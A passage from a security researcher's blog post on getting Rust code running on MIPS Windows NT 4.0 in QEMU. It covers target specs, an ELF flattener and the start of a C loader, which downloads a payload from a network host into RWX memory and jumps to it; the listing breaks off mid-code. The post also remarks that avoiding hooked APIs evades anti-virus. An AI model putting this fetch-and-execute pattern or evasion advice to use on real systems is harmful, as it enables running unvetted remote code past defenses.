<p>Gamozo Labs Blog: Rust on MIPS64 Windows NT 4.0 (2021-11-16)</p>
<h2 id="introduction">Introduction</h2>
<p>Some part of me has always been fascinated with coercing code to run in weird
places. I scratch this itch a lot with my security research projects. These
often lead me to writing shellcode to run in kernels or embedded hardware,
sometimes with the only way being through an existing bug.</p>
<p>For those not familiar, shellcode is honestly hard to describe. I don’t know
if there’s a very formal definition, but I’d describe it as code which can be
run in an environment without any external dependencies. This often means it’s
written directly in assembly, and directly interfaces with the system using
syscalls. Usually the code can be relocated and often is represented as a flat
image rather than a normal executable with multiple sections.</p>
<p>To me, this is extra fun as it’s effectively like operating systems
development. You’re working in an environment where you need to bring most of
what you need along with you. You probably want to minimize the dependencies
you have on the system and libraries to increase compatibility and flexibility
with the environments you run. You might have to bring your own allocator,
make your own syscalls, maybe even make a scheduler if you are really trying
to minimize impact.</p>
<p>Some of these things may seem silly, but when it comes to bypassing
anti-viruses, exploit detection tools, and even mitigations, often the easiest
thing to do is just avoid the common APIs that are hooked and monitored.</p>
<h2 id="streams">Streams</h2>
<p>Before we get into it, it’s important to note that this work has been done over
3 different live streams on my <a href="https://twitch.tv/gamozo">Twitch</a>! You can find these archived
on my <a href="https://www.youtube.com/user/gamozolabs">YouTube</a> channel. Everything covered in this blog can be viewed
as it happened in real time, mistakes, debugging, and all!</p>
<p>The 3 videos in question are:</p>
<p><a href="https://www.youtube.com/watch?v=x0V-CEmXQCQ">Day 1 - Getting Rust running on Windows NT 4.0 MIPS64</a></p>
<p><a href="https://www.youtube.com/watch?v=DtFuuq4iX64">Day 2 - Adding memory management and threading to our Rust on Windows NT MIPS</a></p>
<p><a href="https://www.youtube.com/watch?v=zNAPFaDUM7c">Day 3 - Causing NT 4.0 MIPS to bluescreen without even trying</a></p>
<h2 id="source">Source</h2>
<p>This project has spun off 3 open-source GitHub repos, one for the Rust on NT
MIPS project in general, another for converting ELFs to flat images, and a
final one for parsing <code class="language-plaintext highlighter-rouge">.DBG</code> symbol files for applying symbols to Binary Ninja
or whatever tool you want symbols in! I’ve also documented the commit hashes
for the repos as of this writing, in case things have changed by the time you read this!</p>
<p><a href="https://github.com/gamozolabs/rust_mips_nt4">Rust on NT MIPS - 2028568</a></p>
<p><a href="https://github.com/gamozolabs/elfloader">ELF loader - 30c77ca</a></p>
<p><a href="https://github.com/gamozolabs/coff_nm">DBG COFF parser - b7bcdbb</a></p>
<p>Don’t forget to follow me on socials and like and subscribe of course. Maybe
eventually I can do research and education full time!~ Oh, also follow me on
my Twitter <a href="https://twitter.com/gamozolabs">@gamozolabs</a></p>
<h2 id="mips-on-windows-nt">MIPS on Windows NT</h2>
<p>Windows NT actually has a pretty fascinating history of architecture support.
It supported x86 as we know and love, but additionally it supported MIPS,
Alpha, and PowerPC. If you include the embedded versions of Windows there’s
support for some even more exotic architectures.</p>
<p>MIPS is one of my favorite architectures as the simplicity makes it really fun
to develop emulators for. As someone who writes a lot of emulators, it’s often
one of my first targets during development, as I know it can be implemented in
less than a day of work. Finding out that MIPS NT can run in QEMU was quite
exciting for me. The first time I played around with this was maybe ~5 years
ago, but recently I thought it’d be a fun project to demonstrate harnessing of
targets for fuzzing. Not only does it have some hard problems in harnessing,
as there are almost no existing tools for working with MIPS NT binaries, but
it also leads us to some fun future projects where custom emulators can come
into the picture!</p>
<p>There’s actually a fantastic series by Raymond Chen which I highly recommend
you check out
<a href="https://devblogs.microsoft.com/oldnewthing/20180402-00/?p=98415">here</a>.</p>
<p>There are a few of these series by Raymond for the various architectures on
NT. They don’t pull punches on details, and they’re a fantastic read!</p>
<h2 id="running-windows-nt-40-mips-in-qemu">Running Windows NT 4.0 MIPS in QEMU</h2>
<p>Getting NT 4.0 running in QEMU honestly isn’t too difficult. QEMU already
supports the <code class="language-plaintext highlighter-rouge">magnum</code> machine, which runs on an R4000 MIPS processor, the first
64-bit MIPS processor, running an implementation of the MIPS III ISA.
Unfortunately, out of the box it won’t quite run, as you need a BIOS/bootloader
capable of booting Windows (maybe it’s a video BIOS, I don’t know). You can
find this <a href="http://web.archive.org/web/20150809205748/http://hpoussineau.free.fr/qemu/firmware/magnum-4000/setup.zip">here</a>.
Simply extract the file, and rename <code class="language-plaintext highlighter-rouge">NTPROM.RAW</code> to <code class="language-plaintext highlighter-rouge">mipsel_bios.bin</code>.</p>
<p>Other than that, QEMU will be able to just run NT 4.0 out of the box. There’s
a bit of configuration you need to do in the BIOS to get it to detect your CD,
and you need to configure your MAC address otherwise networking in NT doesn’t
seem to work beyond a DHCP lease. Anyways, you can find more details about
getting MIPS NT 4.0 running in QEMU <a href="http://gunkies.org/wiki/Installing_Windows_NT_4.0_on_Qemu%28MIPS%29">here</a>.</p>
<p>I also cover the process I use, and include my <code class="language-plaintext highlighter-rouge">run.sh</code> script <a href="https://github.com/gamozolabs/rust_mips_nt4">here</a>.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/sh</span>
<span class="nv">ISO</span><span class="o">=</span><span class="s2">"winnt40wks_sp1_en.iso"</span>
<span class="c">#ISO="./Microsoft Visual C++ 4.0a RISC Edition for MIPS (ISO)/VCPP-4.00-RISC-MIPS.iso"</span>
qemu-system-mips64el <span class="se">\</span>
<span class="nt">-M</span> magnum <span class="se">\</span>
<span class="nt">-cpu</span> VR5432 <span class="se">\</span>
<span class="nt">-m</span> 128 <span class="se">\</span>
<span class="nt">-net</span> nic <span class="se">\</span>
<span class="nt">-net</span> user,hostfwd<span class="o">=</span>tcp::5555-:42069 <span class="se">\</span>
<span class="nt">-global</span> ds1225y.filename<span class="o">=</span>nvram <span class="se">\</span>
<span class="nt">-global</span> ds1225y.size<span class="o">=</span>8200 <span class="se">\</span>
<span class="nt">-L</span> <span class="nb">.</span> <span class="se">\</span>
<span class="nt">-hda</span> nt4.qcow2 <span class="se">\</span>
<span class="nt">-cdrom</span> <span class="s2">"</span><span class="nv">$ISO</span><span class="s2">"</span>
</code></pre></div></div>
<p><img src="/assets/qemu_nt_mips.png" alt="Windows NT 4.0 running in QEMU MIPS" /></p>
<h2 id="getting-code-running-on-windows-nt-40">Getting code running on Windows NT 4.0</h2>
<p>Surprisingly, a decent enough environment for development is readily available
for NT 4.0 on MIPS. This includes symbols (included under
<code class="language-plaintext highlighter-rouge">SUPPORT/DEBUG/MIPS/SYMBOLS</code> on the original ISO), as well as debugging tools
such as <code class="language-plaintext highlighter-rouge">ntsd</code>, <code class="language-plaintext highlighter-rouge">cdb</code> and <code class="language-plaintext highlighter-rouge">mipskd</code> (command-line versions of the WinDbg command
interface you may be familiar with), and the cherry on top is a fully working
Visual Studio 4.0 install that will work right inside the MIPS guest!</p>
<p>With Visual Studio 4.0 we can use both the full IDE experience for building
projects, but also the command line <code class="language-plaintext highlighter-rouge">cl.exe</code> compiler and <code class="language-plaintext highlighter-rouge">nmake</code>, my preferred
Windows development experience. I did however use VS4 for the editor as I’m
not using 1996 <code class="language-plaintext highlighter-rouge">notepad.exe</code> for writing code!</p>
<p>Unless you’re doing something really fancy, you’ll be surprised to find that many
of the NT APIs just work out of the box on NT4. This includes your standard
way of interacting with sockets, threads, process manipulation, etc. A few
years ago I wrote a snapshotting tool that used all the APIs that I would in
a modern tool to dump virtual memory regions, read them, and read register
contexts. It’s pretty neat!</p>
<p>Nevertheless, if you’re writing C or C++, other than maybe forgetting about
variables having to be declared at the start of a scope, or not using your
bleeding edge Windows 10 APIs, it’s really no different from modern
Windows development. At least… for low level projects.</p>
<h2 id="rust-and-me">Rust and Me</h2>
<p>After about ~10 years of writing <code class="language-plaintext highlighter-rouge">-ansi -pedantic</code> C, where I followed all the
old fashioned rules of declaring variables at the start of scopes, verbose
syntax, etc, I never would have thought I would find myself writing in a
higher-level language. I dabbled in C++ but I really didn’t like the
abstractions and confusion it brought, although that was arguably when I was
a bit less experienced.</p>
<p>Nevertheless, I found myself absolutely falling in love with Rust. This was a
pretty big deal for me as I have very strong requirements about understanding
exactly what sort of assembly is generated from the code I write. I spend a lot
of time optimizing and squeezing every bit of performance out of my code, and
not having this would ruin a language for me. Something about Rust and its
model of abstractions (traits) makes it actually pretty obvious what code will
be generated, even for things like generics.</p>
<p>The first project I did in Rust was porting my hobby OS to it. Definitely a
“thrown into the deep end” style project, but if Rust wasn’t suitable for
operating systems development, it definitely wasn’t going to be a language I
personally would want to invest in. However… it honestly worked great. After
reading the Rust book, I was able to port my OS which consisted of a small
hypervisor, 10gbit networking stack, and some fancy memory management, in less
than a week.</p>
<p>Anyways, rant aside, as a low-level optimization nerd, there was nothing about
Rust, even in 2016, that raised red flags about being able to replace all of
my C in it. Of course, I have many complaints and many things I would change or
want added to Rust, but that’s going to be the case with any language… I’m
picky.</p>
<h2 id="rust-on-mips-nt-40">Rust on MIPS NT 4.0</h2>
<p>Well, I do all of my projects in Rust now. Even little scripts I’d usually
write in Python I often find myself grabbing Rust for. I’m comfortable enough
using Rust for pretty much any project at this point that I decided, for
a long-ish term stream project (ultimately a snapshot fuzzer for NT), to
do it in Rust.</p>
<p>The very first thought that comes to mind is to just build a MIPS executable
from Rust, and just… run it. Well, that would be great, but unfortunately
there were a few hiccups.</p>
<h3 id="rust-on-weird-targets">Rust on weird targets</h3>
<p>Rust actually has pretty good support for weird targets. I mean, I guess we’re
really just relying on, or limited by <em>cough</em>, LLVM. Not only can you simply
pick your target by the <code class="language-plaintext highlighter-rouge">--target</code> triple argument to Rust and Cargo, but also
when you really need control you can define a custom target specification. This gives
you fine-grained control over the code that gets generated.</p>
<p>For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pleb@gamey ~ $ rustc -Z unstable-options --print target-spec-json
</code></pre></div></div>
<p>Will give you the JSON spec for my native system, <code class="language-plaintext highlighter-rouge">x86_64-unknown-linux-gnu</code></p>
<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
</span><span class="nl">"arch"</span><span class="p">:</span><span class="w"> </span><span class="s2">"x86_64"</span><span class="p">,</span><span class="w">
</span><span class="nl">"cpu"</span><span class="p">:</span><span class="w"> </span><span class="s2">"x86-64"</span><span class="p">,</span><span class="w">
</span><span class="nl">"crt-static-respected"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"data-layout"</span><span class="p">:</span><span class="w"> </span><span class="s2">"e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"</span><span class="p">,</span><span class="w">
</span><span class="nl">"dynamic-linking"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"env"</span><span class="p">:</span><span class="w"> </span><span class="s2">"gnu"</span><span class="p">,</span><span class="w">
</span><span class="nl">"executables"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"has-elf-tls"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"has-rpath"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"is-builtin"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"llvm-target"</span><span class="p">:</span><span class="w"> </span><span class="s2">"x86_64-unknown-linux-gnu"</span><span class="p">,</span><span class="w">
</span><span class="nl">"max-atomic-width"</span><span class="p">:</span><span class="w"> </span><span class="mi">64</span><span class="p">,</span><span class="w">
</span><span class="nl">"os"</span><span class="p">:</span><span class="w"> </span><span class="s2">"linux"</span><span class="p">,</span><span class="w">
</span><span class="nl">"position-independent-executables"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"pre-link-args"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
</span><span class="nl">"gcc"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="s2">"-m64"</span><span class="w">
</span><span class="p">]</span><span class="w">
</span><span class="p">},</span><span class="w">
</span><span class="nl">"relro-level"</span><span class="p">:</span><span class="w"> </span><span class="s2">"full"</span><span class="p">,</span><span class="w">
</span><span class="nl">"stack-probes"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
</span><span class="nl">"kind"</span><span class="p">:</span><span class="w"> </span><span class="s2">"call"</span><span class="w">
</span><span class="p">},</span><span class="w">
</span><span class="nl">"supported-sanitizers"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="s2">"address"</span><span class="p">,</span><span class="w">
</span><span class="s2">"cfi"</span><span class="p">,</span><span class="w">
</span><span class="s2">"leak"</span><span class="p">,</span><span class="w">
</span><span class="s2">"memory"</span><span class="p">,</span><span class="w">
</span><span class="s2">"thread"</span><span class="w">
</span><span class="p">],</span><span class="w">
</span><span class="nl">"target-family"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="s2">"unix"</span><span class="w">
</span><span class="p">],</span><span class="w">
</span><span class="nl">"target-pointer-width"</span><span class="p">:</span><span class="w"> </span><span class="s2">"64"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>
<p>As you can see, there’s a lot of control you have here. There’s plenty more
options than just in this JSON as well. You can adjust your ABIs, data layout,
calling conventions, output binary types, stack probes, atomic support, and
so many more. This JSON can be modified as you need and you can then pass in
the JSON as <code class="language-plaintext highlighter-rouge">--target <your target json.json></code> to Rust, and it “just works”.</p>
<p>I’ve used this to generate code for targets Rust doesn’t support, like Android
on MIPS (okay there’s maybe a bit of a pattern to my projects here).</p>
<h3 id="back-to-rust-on-mips-nt">Back to Rust on MIPS NT</h3>
<p>Anyways, back to Rust on MIPS NT. Let’s just make a custom spec and get LLVM
to generate us a nice portable executable (PE, the <code class="language-plaintext highlighter-rouge">.exe</code> format of Windows)!</p>
<p>Should be easy!</p>
<p>Well… after about ~4-6 hours of tinkering. No. No it is not. In fact, we ran
into an LLVM bug.</p>
<p>It took us some time (well, Twitch chat eventually read the LLVM code instead
of me guessing) to find that the correct target triple if we wanted to get
LLVM to generate a PE for MIPS would be <code class="language-plaintext highlighter-rouge">mips64el-pc-windows-msvccoff</code>. It’s
a weird triple (mainly the <code class="language-plaintext highlighter-rouge">coff</code> suffix), but this is the only path we were
able to find which would cause LLVM to attempt to generate a PE for MIPS. It
definitely seems a bit biased towards making an ELF, but this triple indeed
works…</p>
<p>It works at getting LLVM to try to emit a PE, but unfortunately this feature
is not implemented. Specifically, inside LLVM they will generate the MIPS code,
and then attempt to create the PE by calling <code class="language-plaintext highlighter-rouge">createMCObjectStreamer</code>. This
function doesn’t actually check any of the function pointers before invoking
them, and it turns out that the COFF streamer defaults to <code class="language-plaintext highlighter-rouge">NULL</code>, and for MIPS
it’s not implemented.</p>
<p>Thus… we get a friendly jump to <code class="language-plaintext highlighter-rouge">NULL</code>:</p>
<p><img src="/assets/ripllvm.png" alt="LLVM crash backtrace in GDB" /></p>
<h3 id="can-we-add-support">Can we add support?</h3>
<p>The obvious answer is to quickly take the generic implementation of PE
generation in LLVM and make it work for MIPS and upstream it. Well, after a
deep 30 second analysis of LLVM code, it looks like this would be more work
than I wanted to invest, and after all the issues up to this point my concerns
were that it wouldn’t be the end of the problems.</p>
<h3 id="i-guess-we-have-elfs">I guess we have ELFs</h3>
<p>Well, that leaves us with really only one format that LLVM will generate MIPS
code for, and that’s ELFs. Luckily, I’ve written my fair share of ELF loaders, and I
decided the best way to go would simply be to flatten the ELF into an in-memory
representation and make my own file format that’s easy to write a loader for.</p>
<p>You might think to just use a linker script for this, or to do some magic
<code class="language-plaintext highlighter-rouge">objcopy</code> to rip out code, but unfortunately both of these have limitations.
Linker scripts are fail-open, meaning if you do not specify what happens with
a section, it will just “silently” be added wherever the linker would have put
it by default. There is (to my knowledge) no strict mode, which means if Rust
or LLVM decide to emit some section name you are not expecting, you might end
up with code not being laid out as you expect.</p>
<p><code class="language-plaintext highlighter-rouge">objcopy</code> cannot output zero-initialized BSS sections as they would be
represented in-memory, so once again, this leads to an unexpected section
popping up and breaking the model you expected.</p>
<p>Of course, with enough effort and being picky you can get a linker script to
output whatever format you want, but honestly they kinda just suck to write.</p>
<p>Instead, I decided to just write an ELF flattener. It wouldn’t handle
relocations, imports, exports, permissions or really anything. It wouldn’t even
care about the architecture of the ELF or the payload. Simply, go through each
<code class="language-plaintext highlighter-rouge">LOAD</code> section, place them at their desired address, and pad the space between
them with zeros. This will give a flat in-memory representation of the binary
as it would be loaded without relocations. It doesn’t matter if there’s some
crazy custom assembly or sections defined, the <code class="language-plaintext highlighter-rouge">LOAD</code> sections are all that
matters.</p>
<p>This tool is honestly relatively valuable for other things too, as it can
flatten core dumps (which are also ELFs) into a flat file if you want to
inspect them with your own tooling. I’ve written this ELF loader enough
times that I thought it would be worthwhile writing my <em>best</em> version of
it.</p>
<p>The loader simply parses the absolutely required information from the ELF.
This includes checking <code class="language-plaintext highlighter-rouge">\x7FELF</code> magic, reading the endianness (affects the
ELF integer endianness), and the bitness (also affects ELF layout). Any other
information in the header is ignored. Then I parse the program headers, look
for any <code class="language-plaintext highlighter-rouge">LOAD</code> sections (sections indicated by the ELF to be loaded into
memory) and make the flat file.</p>
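<p>That header validation really is only a few byte checks. Here’s a minimal sketch in Rust of what it boils down to (hypothetical code with my own names, not the actual <code class="language-plaintext highlighter-rouge">elfloader</code> source):</p>

```rust
/// Check the ELF identification bytes: the `\x7FELF` magic, EI_CLASS
/// (bitness), and EI_DATA (endianness). Everything else in the header is
/// ignored, just like the flattener described above.
fn parse_ident(hdr: &[u8]) -> Option<(bool, bool)> {
    // Magic must be exactly \x7FELF
    if hdr.get(..4)? != b"\x7fELF" {
        return None;
    }
    // EI_CLASS: 1 = 32-bit, 2 = 64-bit (affects ELF structure layout)
    let is_64bit = match hdr.get(4)? {
        1 => false,
        2 => true,
        _ => return None,
    };
    // EI_DATA: 1 = little-endian, 2 = big-endian (affects ELF integers)
    let is_little = match hdr.get(5)? {
        1 => true,
        2 => false,
        _ => return None,
    };
    Some((is_64bit, is_little))
}

fn main() {
    // Identification bytes as produced for a mips64el target
    let ident = [0x7f, b'E', b'L', b'F', 2, 1, 1, 0];
    assert_eq!(parse_ident(&ident), Some((true, true)));
}
```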
<p>The ELF format is fairly simple, and the <code class="language-plaintext highlighter-rouge">LOAD</code> sections contain information
about the permissions, virtual address, virtual size (in-memory size), file
offset (location of data to initialize the memory to), and the file size (can
often be less than the memory size, thus any uninitialized bytes are padded
to virtual memory size with zeros).</p>
<p>By concatenating these sections with the correct padding, voilà, we have an
in-memory representation of the ELF.</p>
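<p>The concatenation step can be sketched in a few lines of Rust. This is a hedged toy version (the <code class="language-plaintext highlighter-rouge">Load</code> struct and <code class="language-plaintext highlighter-rouge">flatten</code> name are mine, not the project’s): sort the <code class="language-plaintext highlighter-rouge">LOAD</code> segments by virtual address, zero-fill the gaps between them, and zero-extend each segment from its file size out to its memory size:</p>

```rust
/// One loadable segment, reduced to just the fields the flattener cares
/// about: target virtual address, in-memory size, and initialized bytes.
struct Load {
    vaddr: u64,    // virtual address the segment wants to live at
    memsz: u64,    // in-memory size (may exceed the initialized data)
    data: Vec<u8>, // the `filesz` initialized bytes from the file
}

/// Concatenate LOAD segments into one flat image based at the lowest vaddr,
/// zero-padding the gaps between segments and any uninitialized (BSS) tails.
fn flatten(mut loads: Vec<Load>) -> Option<(u64, Vec<u8>)> {
    loads.sort_by_key(|l| l.vaddr);
    let base = loads.first()?.vaddr;
    let mut image = Vec::new();
    for l in &loads {
        // Zero-pad from the current end of the image to this segment's start
        let off = (l.vaddr - base) as usize;
        if off < image.len() {
            return None; // overlapping segments, bail out
        }
        image.resize(off, 0);
        // Initialized bytes first, then zero-fill out to the memory size
        image.extend_from_slice(&l.data);
        image.resize(off + l.memsz as usize, 0);
    }
    Some((base, image))
}

fn main() {
    let loads = vec![
        Load { vaddr: 0x1000, memsz: 4, data: vec![1, 2] }, // 2-byte BSS tail
        Load { vaddr: 0x1008, memsz: 2, data: vec![9, 9] }, // 4-byte gap
    ];
    let (base, image) = flatten(loads).unwrap();
    assert_eq!(base, 0x1000);
    assert_eq!(image, [1, 2, 0, 0, 0, 0, 0, 0, 9, 9]);
}
```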
<p>I decided to make a custom FELF (“Falk ELF”) format that indicates where this
blob needs to be loaded into memory, and the entry point address that needs
to be jumped to to start execution.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FELF0001 - Magic header
entry - 64-bit little endian integer of the entry point address
base - 64-bit little endian integer of the base address to load the image
<image> - Rest of the file is the raw image, to be loaded at `base` and jumped
into at `entry`
</code></pre></div></div>
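<p>That layout is trivial to serialize and parse. A Rust sketch of both directions (hypothetical helper names, mirroring the header described above):</p>

```rust
use std::convert::TryInto;

/// Serialize a FELF: the "FELF0001" magic, then `entry` and `base` as
/// 64-bit little-endian integers, then the raw image bytes.
fn write_felf(entry: u64, base: u64, image: &[u8]) -> Vec<u8> {
    let mut out = Vec::with_capacity(24 + image.len());
    out.extend_from_slice(b"FELF0001");
    out.extend_from_slice(&entry.to_le_bytes());
    out.extend_from_slice(&base.to_le_bytes());
    out.extend_from_slice(image);
    out
}

/// Parse a FELF back into (entry, base, image), validating the magic
fn parse_felf(felf: &[u8]) -> Option<(u64, u64, &[u8])> {
    if felf.get(..8)? != b"FELF0001" {
        return None;
    }
    let entry = u64::from_le_bytes(felf.get(8..16)?.try_into().ok()?);
    let base  = u64::from_le_bytes(felf.get(16..24)?.try_into().ok()?);
    Some((entry, base, &felf[24..]))
}

fn main() {
    // Round-trip a tiny image with a made-up base and entry point
    let felf = write_felf(0x8000_0040, 0x8000_0000, &[0x13, 0x37]);
    let (entry, base, image) = parse_felf(&felf).unwrap();
    assert_eq!((entry, base), (0x8000_0040, 0x8000_0000));
    assert_eq!(image, &[0x13, 0x37][..]);
}
```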
<p>Simple! You can find the source code to this tool at
<a href="https://github.com/gamozolabs/elfloader">My GitHub for elfloader</a>. This
tool also has support for making a raw file, and picking a custom base, not
for relocations, but for padding out the image. For example, if you have the
core dump of a QEMU guest, you can run it through this tool with
<code class="language-plaintext highlighter-rouge">elfloader --binary --base=0 <coredump></code> and it will produce a flat file with
no headers representing all physical memory with MMIO holes and gaps padded
with zero bytes. You can then <code class="language-plaintext highlighter-rouge">mmap()</code> the file and write your own tools to
browse through a guest’s physical memory (or virtual memory if you write page
table walking code)! Maybe this is a problem only I run into often, but within
a few days of writing this I’ve even had a coworker use it.</p>
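<p>Once you have that flat file, “reading guest physical memory” is nothing more than slicing at <code class="language-plaintext highlighter-rouge">paddr - base</code>. A tiny hypothetical helper (my own sketch, not part of the tool):</p>

```rust
/// Read `len` bytes of guest physical memory from a flattened image that
/// was produced with a given `base` (0 if `--base=0` was used).
fn read_phys(image: &[u8], base: u64, paddr: u64, len: usize) -> Option<&[u8]> {
    // Addresses below the base, or reads past the end, simply fail
    let off = paddr.checked_sub(base)? as usize;
    image.get(off..off.checked_add(len)?)
}

fn main() {
    // Pretend this is a (tiny) flattened physical memory image based at 0
    let image = [0xde, 0xad, 0xbe, 0xef, 0x00, 0x00];
    assert_eq!(read_phys(&image, 0, 2, 2), Some(&[0xbe, 0xef][..]));
    assert_eq!(read_phys(&image, 0, 4, 8), None); // out-of-bounds read
}
```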
<p>Anyways, enough selling you on this first cool tool we produced. We can turn
an ELF into an in-memory initial representation, woohoo.</p>
<h3 id="felf-loader">FELF loader</h3>
<p>To load a FELF for execution on Windows, we’ll of course need to write a
loader. We could convert the FELF into a PE, but at this point it’s
less effort for us to just use the VC4.0 installation in our guest to write
a very tiny loader. All we have to do is read a file, parse a simple header,
<code class="language-plaintext highlighter-rouge">VirtualAlloc()</code> some RWX memory at the target address, copy the payload to
the memory, and jump to entry!</p>
<p>Unfortunately, this is where it started to get dicey. I don’t know if
it’s my window manager, QEMU, or Windows, but very frequently my mouse would
start randomly jumping around in the VM. This meant that I pretty much had
to do all of my development and testing in the VM with only the keyboard. So,
we immediately scrapped the idea of loading a FELF from disk, and went for
network loading.</p>
<h4 id="remote-code-execution">Remote code execution</h4>
<p>As long as we configured a unicast MAC address in our MIPS BIOS (yeah, we
learned the hard way that non-unicast MAC addresses randomly generated by
DuckDuckGo indeed fail in a very hard to debug way), we had access to our host
machine (and the internet) in the guest.</p>
<p>Why load from disk, which would require shutting down the VM to mount the disk
and copy the file into it, when we could just make this a remote loader? So,
that’s what we did!</p>
<p>We wrote a very simple client that when invoked, would connect to the server,
download a <code class="language-plaintext highlighter-rouge">FELF</code>, load it, and execute it. This was small enough that
developing this inside the VM in VC4.0 was totally fine.</p>
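<p>The host side of this protocol is equally tiny. Here’s a hedged Rust sketch of a one-shot server matching what the client below expects, a 4-byte payload length (little-endian, to match the mips64el guest) followed by the FELF bytes; the function name and loopback demo are mine, not the actual project’s code:</p>

```rust
use std::io::{Read, Write};
use std::net::{TcpListener, TcpStream};
use std::thread;

/// Serve one FELF to a connecting client: a 4-byte little-endian payload
/// length (matching what the in-guest C loader recv()s), then the payload.
fn serve_one(listener: &TcpListener, payload: &[u8]) -> std::io::Result<()> {
    let (mut client, _) = listener.accept()?;
    client.write_all(&(payload.len() as u32).to_le_bytes())?;
    client.write_all(payload)?;
    Ok(())
}

fn main() -> std::io::Result<()> {
    // Demo over loopback; in real use you'd bind the port the guest's
    // loader connects to and send an actual FELF file's bytes.
    let listener = TcpListener::bind("127.0.0.1:0")?;
    let addr = listener.local_addr()?;
    let server = thread::spawn(move || serve_one(&listener, b"hello"));

    // Stand-in for the in-guest client: read length, then payload
    let mut buf = Vec::new();
    TcpStream::connect(addr)?.read_to_end(&mut buf)?;
    server.join().unwrap()?;
    assert_eq!(&buf[..4], &5u32.to_le_bytes());
    assert_eq!(&buf[4..], b"hello");
    Ok(())
}
```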
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>
</span>
<span class="kt">int</span>
<span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SOCKET</span> <span class="n">sock</span><span class="p">;</span>
<span class="n">WSADATA</span> <span class="n">wsaData</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">off</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sockaddr</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="c1">// Initialize WSA</span>
<span class="k">if</span><span class="p">(</span><span class="n">WSAStartup</span><span class="p">(</span><span class="n">MAKEWORD</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">),</span> <span class="o">&</span><span class="n">wsaData</span><span class="p">))</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"WSAStartup() error : %d"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Create TCP socket</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="n">IPPROTO_TCP</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">sock</span> <span class="o">==</span> <span class="n">INVALID_SOCKET</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"socket() error : %d"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">inet_addr</span><span class="p">(</span><span class="s">"192.168.1.2"</span><span class="p">);</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="mi">1234</span><span class="p">);</span>
<span class="c1">// Connect to the socket</span>
<span class="k">if</span><span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">sockaddr</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sockaddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sockaddr</span><span class="p">))</span> <span class="o">==</span> <span class="n">SOCKET_ERROR</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"connect() error : %d"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Read the payload length</span>
